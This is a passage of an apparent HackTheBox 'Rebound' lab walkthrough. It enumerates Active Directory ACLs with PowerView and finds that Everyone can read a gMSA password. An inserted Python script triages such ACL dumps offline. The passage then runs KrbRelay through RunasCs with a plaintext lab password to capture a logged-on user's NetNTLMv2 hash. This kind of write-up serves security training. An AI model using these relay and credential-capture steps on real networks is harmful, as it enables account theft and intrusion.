ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Schema Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-518
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-519
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Domain Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-512
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Server Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-549
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Account Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-548
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-9
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Read-only Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-521
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-526
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Enterprise Key Admins,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-527
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : GenericRead
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 131220
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=ppaul,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1951
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=llune,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-2952
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=fflock,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-3382
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=jjones,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5277
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=mmalone,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5569
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=nnoon,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-5680
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7681
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=oorend,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7682
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7684
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7685
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=tbrady,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7686
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessDeniedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ReadProperty
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : e362ed86-b728-0842-b27d-2dea7a9df218
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

The pipeline filter keeps only the ACEs whose SecurityIdentifier is S-1-1-0. S-1-1-0 is the well-known SID of the Everyone group, i.e. every authenticated user and guest (Anonymous is only included when the "Let Everyone permissions apply to anonymous users" policy is enabled, which is off by default).

Add -ResolveGUIDs to translate the GUIDs, and filter once more on delegator's DN: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb

What -ResolveGUIDs does: the parameter looks up the schema and the Extended-Rights container on the DC and replaces each ObjectAceType GUID with the readable name of the extended right or attribute. In the output above, ab721a53-1e2f-11d0-9819-00aa0040529b is the User-Change-Password right, 00299570-246d-11d0-a768-00aa006e0529 is User-Force-Change-Password, and e362ed86-b728-0842-b27d-2dea7a9df218 is the ms-DS-ManagedPassword attribute; the resolved output below confirms the mapping for the two delegator ACEs.

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainobjectacl -ResolveGUIDs | where-object { $_.SecurityIdentifier -eq "S-1-1-0" -and $_.ObjectDN -match "CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb" }


AceQualifier : AccessDenied
ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Force-Change-Password
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
InheritanceFlags : None
BinaryLength : 40
AceType : AccessDeniedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ActiveDirectoryRights : ReadProperty
ObjectAceType : ms-DS-ManagedPassword
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

The second entry is the useful one: Everyone is allowed ReadProperty on ms-DS-ManagedPassword, the gMSA (group Managed Service Account) password of delegator$. Two caveats: the DC returns msDS-ManagedPassword only over an encrypted LDAP channel (LDAPS or a sealed bind), and only to principals listed in the account's msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword), so this ACE by itself does not let any account read the password; that is why the password is fetched below with tbrady's credentials rather than winrm_svc's.
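The same triage can be done offline against a saved Get-DomainObjectAcl dump. The following Python is an added example (not from the original writeup or from PowerView): it parses PowerView's key/value record format, resolves the ObjectAceType GUIDs seen above from a small local table instead of querying the DC, and flags only AccessAllowed ACEs granted to broad principals on rights that matter, so deny ACEs and benign defaults such as User-Change-Password on AdminSDHolder are not reported. The sample records are constructed from the output above; the GUID for msDS-AllowedToActOnBehalfOfOtherIdentity is added from the AD schema for completeness.

```python
"""Offline triage of a PowerView Get-DomainObjectAcl dump (added example)."""

# ObjectAceType GUIDs: extended rights and attribute schema IDs
GUID_NAMES = {
    "ab721a53-1e2f-11d0-9819-00aa0040529b": "User-Change-Password",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "e362ed86-b728-0842-b27d-2dea7a9df218": "ms-DS-ManagedPassword",
    "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity",
    "00000000-0000-0000-0000-000000000000": "All",
}
BROAD_PRINCIPALS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
                    "S-1-5-7": "Anonymous", "S-1-5-32-545": "Users"}
UNCONDITIONAL = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
# Rights that are only dangerous for particular targets (object-type ACEs)
SENSITIVE = {
    "ExtendedRight": {"User-Force-Change-Password", "All"},
    "WriteProperty": {"ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity", "All"},
    "ReadProperty": {"ms-DS-ManagedPassword"},
}

# Constructed from the Get-DomainObjectAcl output above (fields trimmed)
SAMPLE = """\
ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ExtendedRight
ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529
AceQualifier : AccessDenied
SecurityIdentifier : S-1-1-0

ObjectDN : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights : ReadProperty
ObjectAceType : e362ed86-b728-0842-b27d-2dea7a9df218
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-1-0

ObjectDN : CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32
ActiveDirectoryRights : ReadProperty
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-1-0

ObjectDN : CN=AdminSDHolder,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : ExtendedRight
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
AceQualifier : AccessAllowed
SecurityIdentifier : S-1-1-0
"""


def resolve_guid(guid: str) -> str:
    """Mimic -ResolveGUIDs; an empty ObjectAceType means the ACE covers everything."""
    return GUID_NAMES.get(guid.lower(), guid) if guid else "All"


def parse_powerview_acl(text: str) -> list:
    """Records are blank-line separated blocks of 'Key : Value' lines."""
    records = []
    for block in text.strip().split("\n\n"):
        rec = {}
        for line in block.splitlines():
            key, _, value = line.partition(":")
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def triage(records: list) -> list:
    findings = []
    for ace in records:
        sid = ace.get("SecurityIdentifier", "")
        if sid not in BROAD_PRINCIPALS or ace.get("AceQualifier") != "AccessAllowed":
            continue  # deny ACEs restrict rather than grant
        target = resolve_guid(ace.get("ObjectAceType", ""))
        for right in ace.get("ActiveDirectoryRights", "").split(","):
            right = right.strip()
            if right in UNCONDITIONAL or (right in SENSITIVE and target in SENSITIVE[right]):
                findings.append({"dn": ace["ObjectDN"], "principal": BROAD_PRINCIPALS[sid],
                                 "right": right, "on": target})
    return findings


if __name__ == "__main__":
    for f in triage(parse_powerview_acl(SAMPLE)):
        print(f"{f['principal']} has {f['right']} on {f['on']} of {f['dn']}")
```

Feed it a dump saved with `Get-DomainObjectAcl | Out-File`; because unresolved names pass through `resolve_guid` unchanged, a dump produced with -ResolveGUIDs works as well.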

KrbRelay

GitHub - cube0x0/KrbRelay: Framework for Kerberos relaying

First build a Release binary with Visual Studio.

Upload it once compiled.

upload /root/htb/Rebound/KrbRelay.exe

Check the OS version first. systeminfo errors out, so use Get-ComputerInfo instead (a built-in PowerShell cmdlet, not part of PowerView).

*Evil-WinRM* PS C:\Users\winrm_svc> get-computerinfo | findstr "WindowsProductName"
WindowsProductName : Windows Server 2019 Standard

It is Server 2019, so KrbRelay is launched through RunasCs with logon type 9 (`-l 9`, NewCredentials). With that logon type the supplied username and password are not validated at logon time, only when they are used over the network, so wrong credentials are accepted as long as nothing touches the network and fail as soon as something does. The relay targets session 1, where tbrady is logged on, and captures tbrady's NetNTLMv2 hash.

*Evil-WinRM* PS C:\Users\winrm_svc> .\RunasCs.exe oorend '1GR8t@$$4u' -l 9 '.\KrbRelay.exe -session 1 -clsid 38e441fb-3d16-422f-8750-b2dacec5cefc -ntlm'

[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAADJ8EYmRD5XvCbYsawwC+0xAkAAAMAR///WWbduB93mnyIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 38e441fb-3d16-422f-8750-b2dacec5cefc
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b208e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c289e28463988f28bd04e7000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008003054408876a5db0100000000000000000000000074002e00570069006e0064006f00770068502e4b0b010000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:8463988f28bd04e7:01610cb29e4e940afbd48a90f95daac7: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
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
at KrbRelay.Program.Main(String[] args)
